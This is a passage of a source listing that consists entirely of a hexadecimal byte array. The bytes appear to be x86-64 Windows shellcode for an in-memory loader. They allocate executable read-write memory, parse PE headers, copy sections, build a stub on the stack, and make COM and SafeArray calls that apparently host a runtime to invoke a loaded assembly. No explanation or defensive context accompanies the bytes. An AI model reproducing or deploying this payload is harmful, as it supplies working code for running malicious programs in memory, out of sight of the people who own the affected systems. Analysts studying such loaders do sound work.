316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
